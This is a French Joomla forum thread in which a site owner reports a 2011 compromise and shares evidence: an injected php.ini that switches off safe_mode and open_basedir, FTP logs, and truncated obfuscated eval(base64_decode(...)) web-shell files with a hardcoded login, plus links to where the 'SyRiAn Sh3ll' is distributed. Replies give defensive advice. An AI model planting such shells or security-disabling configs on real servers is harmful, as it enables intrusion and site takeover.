Joomla 1.5.22 piraté

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Joomla 1.5.22 piraté

    je vient de trouvé ce matin dans la racine de mon hebergement un dossier "file:" vide et un fichier "php.ini" contenant le code

    Code PHP:
    safe_mode Off
    disable_functions 
    NONE
    safe_mode_gid 
    OFF
    open_basedir 
    OFF 
    je suis sur joomla 1.5.22 et j'ai installer crawlprotect et crawltrack sur le meme hebergement

    Chmod des dossiers est mis a 755
    Chmod des fichiers est mis a 644

    je vous demande de m'aidé a retrouvé le probleme d'ou il vient et stop ces injection de fichier

  • #2
    Re : Joomla 1.5.22 piraté

    ça ne m'évoque pas du piratage, ça !
    Vérifie que ce ne soit pas tout simplement ton hébergeur...
    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide). MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info hébergés chez PHPNET - +sites gérés chez 1and1 et OVH - Site pro : www.robertg-conseil.fr

    Commentaire


    • #3
      Re : Joomla 1.5.22 piraté

      oui je vient de leur ecrire et ils disent qu'il n'ont pas envoyer des fichiers je vient de voire mes logs du site et j'ai trouvé encore 6 autre fichier injecté

      dans le dossier compement :

      php.ini
      .httaccess

      dans le dossier media:

      php.ini
      .httaccess

      dans le dossier rasine:

      php.ini
      [file:]

      mes logs de visiteur indique que les fichier son été créer par une adresse IP du maroc

      et si sa continue je risque d'etre bani par google

      svp aidé moi

      Commentaire


      • #4
        Re : Joomla 1.5.22 piraté

        C'est étonnant que Crawlprotect et Crawltrack ne bloquent pas l'accès !
        As-tu changé le mot de passe FTP et celui de super-administrateur ? As-tu vérifié que tu n'utilises pas une extension présentant des failles de sécurité ?

        Pour plus de chances de réponses, je déplace la discussion dans le forum sécurité.
        "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide). MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info hébergés chez PHPNET - +sites gérés chez 1and1 et OVH - Site pro : www.robertg-conseil.fr

        Commentaire


        • #5
          Re : Joomla 1.5.22 piraté

          Oui j'ai changé absolument tous mots de passe ftp et mots de passe super admin et mots de passe de base de donnée car c'est la deuxieme fois que je me pirate de la meme maniere c'est pour cette raison j'ai installé crowlprotect et crowltrack. je vais vous envoyer ce soir une partie des logs pour veriffié si sa serai utile mais je continue a bloqué tous les accés et les forms sur le site et je vais vous faire une liste de composant que j'utilise si sa aide pour trouvé le probleme
          Dernière édition par pubvision à 14/01/2011, 17h20

          Commentaire


          • #6
            Re : Joomla 1.5.22 piraté

            Code:
            Tue Jan 04 22:25:05 2011 0 **.**.**.** 86 /home/[myroot]/public_html/php.ini a _ o r [myftppseudo] ftp 1 * c
            Wed Jan 12 05:10:28 2011 0 **.**.**.** 83 /home/[myroot]/public_html/components/php.ini b _ o r [myftppseudo] ftp 1 * c
            Thu Jan 13 23:18:16 2011 0 41.92.4.10 72 /home/[myroot]/public_html/media/php.ini a _ i r [myftppseudo] ftp 1 * c
            Fri Jan 14 00:01:50 2011 0 41.92.4.10 96 /home/[myroot]/public_html/media/php.ini a _ i r [myftppseudo] ftp 1 * c
            Fri Jan 14 03:56:48 2011 0 **.**.**.** 83 /home/[myroot]/public_html/components/php.ini b _ o r [myftppseudo] ftp 1 * c
            Fri Jan 14 06:36:01 2011 0 **.**.**.** 83 /home/[myroot]/public_html/components/php.ini b _ o r [myftppseudo] ftp 1 * c
            Fri Jan 14 16:59:17 2011 0 **.**.**.** 83 /home/[myroot]/public_html/php.ini b _ o r [myftppseudo] ftp 1 * c
            voila le log FTP j'ai remarqué une adresse IP "41.92.4.10" du maroc les autre son mes adresse IP car j'ai un IP non fix j'ai testé les ip avec http://www.adresse-ip.biz/ pour les localisé.

            donc voila je regarde les autres logs en attendant votre expertise en premier temps pour le logs FTP

            en parcourant aussi les dossiers du site j'ai trouvé d'autre fichiers cachés par example err_log, CREDIT.php dans le dossier components et media

            example de contenue du fichier

            Code:
            [08-Jan-2011 22:36:18] PHP Warning:  shell_exec() has been disabled for security reasons in /home/****/public_html/components/CREDIT.php(19) : eval()'d code on line 154
            [08-Jan-2011 22:36:18] PHP Warning:  shell_exec() has been disabled for security reasons in /home/****/public_html/components/CREDIT.php(19) : eval()'d code on line 162

            le fichier crédit.php (c'est une bombe)

            Code PHP:
            <?php
            #  ,--^----------,--------,-----,-------^--,
            #  | |||||||||   `--------'     |          O    .. Multi Tools [ V2 ]  ....  sy34[at]msn[dot]com
            #  `+---------------------------^----------|
            #    `\_,-------, __EH << SyRiAn | 34G13__|
            #      / XXXXXX /`|     /
            #     / XXXXXX /  `\   /
            #    / XXXXXX /\______(
            #   / XXXXXX /
            #  / XXXXXX /
            # (________(
            #  `------

            $uselogin 1;    // Make It 0 If you Want To Disable Auth
            $user 'admin';  // Username
            $pass '1111';   // Password
            ?>
            <?
            eval(base64_decode('Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KLy8gIEZ1bmN0aW9ucyA6cCAgIC8vLw0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KZnVuY3Rpb24gZm9vdGVyKCkNCnsNCmVjaG8gIgk8L2Zvcm0+PC9jZW50ZXI+PC9jZW50ZXI+PC9wPjwvZm9udD48L3RkPjwvdHI+PC90Ym9keT48L3RhYmxlPjx0YWJsZSBiZ2NvbG9yPSNjY2NjY2Mgd2lkdGg9MTAwJT48dGJvZHk+PHRyPjx0ZCBhbGlnbj1yaWdodCB3aWR0aD0xMDA+DQo8cCBkaXI9bHRyPjxiPjxmb250IGNvbG9yPWdyYXkgIHNpemU9LTI+PHAgYWxpZ249bGVmdD48Y2VudGVyPjxiPjxmb250IGNvbG9yPWdyYXk+QzBEM0QgQnk8L2ZvbnQ+PGZvbnQgY29sb3I9Izk5MDAwMD4mbmJzcDsgfn4gWyA8L2ZvbnQ+DQo8Zm9udCB...........?>
            et encor d'autre fichiers trouvé :

            image.php

            Code PHP:
            <?
            eval(base64_decode('LyoNCiAqIE15U1FMIFdlYiBJbnRlcmZhY2UgVmVyc2lvbiAyDQ
            ogKiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQog
            KiBEZXZlbG9wZWQgQnkgc05pcGVyX2hFeA0KKi8NCg0KaWYgKC
            BmdW5jdGlvbl9leGlzdHMoJ2luaV9nZXQnKSApIHsNCgkkb25v
            ZmYgPSBpbmlfZ2V0KCdyZWdpc3Rlcl9nbG9iYWxzJyk7DQp9IG
            Vsc2Ugew0KCSRvbm9mZiA9IGdldF9jZmdfdmFyKCdyZWdpc3Rl...............'
            );?>
            j'ai tranqué le fichier il est grand

            autres fichiers trouver sur le logs ftp qui ne se trouve pas dans le serveur lié au meme IP "41.92.4.10" avec meme comande ftp a _ i r

            /media/cat.php
            /media/cate.php
            /media/reply.php

            les composant installer sur ma version joomla son:

            com_jform (désactivé aujourd hui depuis un mois)
            com_sh404sef
            com_comprofiler
            com_k2
            com_ninjarsssyndicator
            com_xmap
            com_jupdateman
            com_ckforms (désactivé depuis panel de gestion de composant)

            le journal de crawltrack indique:
            Injection de code=0
            Injection SQL=0

            j'ai besoin svp d'une solution rapide car mon RANK ne cesse d'augmenté et je perde sur le classement du referancement, si vous avez besoin d'autre information je suis a votre disposition
            Dernière édition par pubvision à 14/01/2011, 21h13

            Commentaire


            • #7
              Re : Joomla 1.5.22 piraté

              que doit-je faire je suis piraté jusqu au coup????

              Commentaire


              • #8
                Re : Joomla 1.5.22 piraté

                Bonsoir,

                Le piratage via FTP implique à 999 chances sur 1000 que c'est ton PC qui a été compromis et refile tes identifiants et passes à qui les veut. Donc, relis les conseils épinglés dans ce forum sécurité, ça te permettra de trouver la solution.
                Pas de demande de support par MP.
                S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                Commentaire


                • #9
                  Re : Joomla 1.5.22 piraté

                  mais mes mots de passe msn et autre mot de passe n'ont pas été changé tous vas bien seulement se site est piraté et avast 5.0 n'a pas donné aucune alert pour les virus le PC est propre je pense

                  Commentaire


                  • #10
                    Re : Joomla 1.5.22 piraté

                    comment je peut netoyer les dossiers joomla des fichier infecté?

                    Commentaire


                    • #11
                      Re : Joomla 1.5.22 piraté

                      vraiment je ne sais pas d'ou je vais commencé!

                      Commentaire


                      • #12
                        Re : Joomla 1.5.22 piraté

                        en lisant en profondeur les (très longues) discussions des sujets épinglés de ce forum. Je ne vais quand même pas les recopier ici...
                        Pas de demande de support par MP.
                        S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                        Commentaire


                        • #13
                          Re : Joomla 1.5.22 piraté

                          j'ai trouvé le script de piratage sur ce lien http://www.syrian-shell.com/snapshots.php

                          voila le script en image



                          qu es que vous en dite? c'est un piratage niveau joomla ou niveau pc?

                          et voila le documentation

                          http://www.hackworld.eu/pizda-mati/3487-SyRiAn-Sh3ll-v3

                          et comme tu peut le lire sur le forum de discription

                          Joomla Hack : Contains Three Queries .. Inject ( 2 Templates )
                          Dernière édition par pubvision à 14/01/2011, 23h30

                          Commentaire


                          • #14
                            Re : Joomla 1.5.22 piraté

                            Bonsoir,

                            Ce que tu expliques ressemble à une injection via un script Perl exploitant une faille de PHP < PHP 5.2.14...

                            Ta seule solution est de nettoyer ton site, demander à ton hébergeur de mettre à jour vers PHP 5.3.4 ou PHP 5.2.14.

                            Je n'entrerai pas dans les détails de la faille qui permet ce type d'injection, mais la mise à niveau de PHP est indispensable, sinon, même en appliquant les directives de cette section sécurité du forum, le site reste vulnérable.
                            Pas de demande de support par MP.
                            S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                            Commentaire


                            • #15
                              Re : Joomla 1.5.22 piraté

                              bonsoir

                              la version du php que j'utilise est tres recente :

                              Version Apache 2.2.17
                              Version PHP 5.2.15
                              Version MySQL 5.0.91-community-log

                              j'ai voulu tester de piraté mon site de la meme façon pour trouvé la faille mais le probleme l'archive contien un virus donc j'abondone le teste

                              je vais essaye de trouvé une autre solution et j'espere que vous me donné quelques pistes pour m'aidé sa serai super

                              en attandant si je desactive le CGI d'appache sa change quelque chose? j'ai lu sa sur un forum!

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins
                              Travaille ...
                              X